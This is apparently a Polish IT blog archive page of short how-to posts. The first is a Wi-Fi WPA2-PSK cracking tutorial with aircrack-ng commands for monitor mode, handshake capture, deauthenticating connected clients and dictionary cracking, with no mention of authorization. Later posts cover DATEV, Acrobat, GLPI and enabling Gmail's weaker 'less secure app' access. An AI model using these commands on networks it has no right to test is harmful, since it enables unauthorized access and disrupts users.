Category Archives: Inne

Inne problemy

Łamanie hasła do sieci bezprzewodowej WiFi WPA2-PSK

W celu złamania hasła do sieci WiFi wykorzystany został w tym przypadku system Kali Linux w wersji 2025.2 oraz karta sieciowa Intel Dual Band Wireless-AC 8265.

W skrócie oto lista kroków jakie trzeba wykonać:

  1. Zainstalowanie poprawnego sterownika karty sieciowej;
  2. Ustawienie karty sieciowej  w tryb monitorowania;
  3. Rozpoczęcie przechwytywania pakietów;
  4. Rozłączenie klienta, który jest aktualnie podłączony do sieci w celu jego ponownego połączenia i przechwycenia w ten sposób pakietów autoryzacyjnych;
  5. Wyłączenie trybu monitorowania karty sieciowej;
  6. Rozkodowanie hasła z przechwyconych pakietów (z pliku z rozszerzeniem .cap);

Skonfigurowanie karty w tryb monitorowania

airmon-ng check
airmon-ng check kill
airmon-ng start wlan0

Airmon utworzy nowy interfejs sieciowy, w tym przypadku o nazwie wlan0mon. Do wyświetlenia wszystkich interfejsów bezprzewodowych służy polecenie iwconfig.

Wyświetlenie wszystkich sieci bezprzewodowych w pobliżu

airodump-ng wlan0mon

Rozpoczęcie przechwytywania pakietów do pliku capture_file

airodump-ng wlan0mon --bssid MAC_ADDRESS_OF_AP_HERE -c CHANNEL_NUMBER_HERE -w ./capture_file

Rozłączenie aktualnie podłączonego klienta w celu przechwycenia pakietów handshake – nawiązujących połączenie:

aireplay-ng wlan0mon --deauth NUMBER_OF_PACKETS_EGZAPLE_20 -a MAC_ADDRESS_OF_AP_HERE -h MAC_ADDRESS_OF_COMPUTER_CONNECTED_TO_NETWORK_HERE

Po wyświetleniu napisu WPA handshake: MAC_ADDRESS_OF_AP można zakończyć przechwytywanie pakietów.

Łamanie hasła za pomocą narzędzia aircrack-ng

aircrack-ng -w FILE_WITCH_WORDLIST wpa2-01.cap

Wyłączenie trybu monitorowania karty sieciowej

airmon-ng stop wlan0mon

Restart serwisu

service network-manager start

 

Listy słownikowe do łamania haseł metodą bruteforce można pobrać pod adresem:

https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html

DATEV Audit – tworzenie kopii bezpieczeństwa, odinstalowanie programu.

Aby utworzyć kopię bezpieczeństwa programu DATEV Audit należy uruchomić DATEV SQL Manager (Start -> wpisać: dsqlm) i zamknąć bazę programu.
Następnie należy przekopiować katalog C:\ProgramData\DATEV\Daten w bezpieczne miejsce.

Najprostszym sposobem odinstalowania programu jest pobranie narzędzia deinstnacharbeitentool.exe ze strony: https://download.datev.de/download/deinstallationsnacharbeiten_v311/deinstnacharbeitentool.exe i uruchomienie go z poświadczeniami administratora.

Ostatnim krokiem jest usunięcie katalogu C:\ProgramData\DATEV-NetInfo

Źródło: https://apps.datev.de/help-center/documents/1080019

Acrobat Reader – jak rozwiązać problem z walidacją podpisu elektronicznego.

Ostatnio napotykane są coraz częstsze problemy z weryfikacją podpisu elektronicznego w plikach PDF. Zamiast zielonego „ptaszka” pojawia się znak zapytania, mówiący że Acrobat Reader nie może zweryfikować podpisu elektronicznego. Aby rozwiązać problem należy wczytać / zaktualizować listę zaufanych certyfikatów z serwera Adobe. Aby tego dokonać należy wejść w: Menu -> Preferencje -> Menadżer zaufania i zaznaczyć opcje (jeżeli nie są zaznaczone):
„Wczytaj zaufane certyfikaty z serwera Adobe AATL”
oraz
„Wczytaj zaufane certyfikaty z serwera Adobe EUTL”
Należy również kliknąć na przycisk „Uaktualnij teraz” przy obu w/w opcjach.
Następnie najlepiej wyłączyć i włączyć ponownie program Acrobat Reader.

GLPI – instalacja na Windows ( XAMPP 8.1.2 – Apache 2.4.52, PHP 8.1.2)

  1. W pliku php.ini należy dodać/odkomentować linie:
    extension=sodium
    extension=intl
    extension=imap
    extension=ldap
    extension=gd
    zend_extension=opcache
    extension=php_apcu.dll
    extension=php_xmlrpc.dll
  2. Ściągnąć pliki z stron:
    https://pecl.php.net/package/APCu/5.1.21/windows
    https://pecl.php.net/package/xmlrpc/1.0.0RC3/windows – jak jeden plik .dll nie działa to drugi 🙂
  3. Ściągnięte pliki (tj. php_apcu.dll oraz php_xmlrpc.dll) wgrać do katalogu: C:\xampp\php\ext
  4. Skopiować php/libsodium.dll do apache/bin/
  5. Restart serwera Apache

 

Wykorzystywanie konta Gmail w aplikacjach

Czasem zachodzi potrzeba wykorzystywania konta e-mail, np Gmaila do potrzeb wysyłania logów z serwera (np. przy pomocy darmowego klienta SMTP SendEmail: http://caspian.dotconf.net/menu/Software/SendEmail/). Aby jednak program mógł używać konta Gmail niezbędna jest odpowiednia konfiguracja tego konta a mianowicie zaznaczenie zezwolenia na używanie go w mniej bezpiecznych aplikacjach poprzez wejście w zakładkę: zarządzaj kontem google -> Security -> Less secure app access -> włączenie na ON.

Oto bezpośredni link: https://myaccount.google.com/lesssecureapps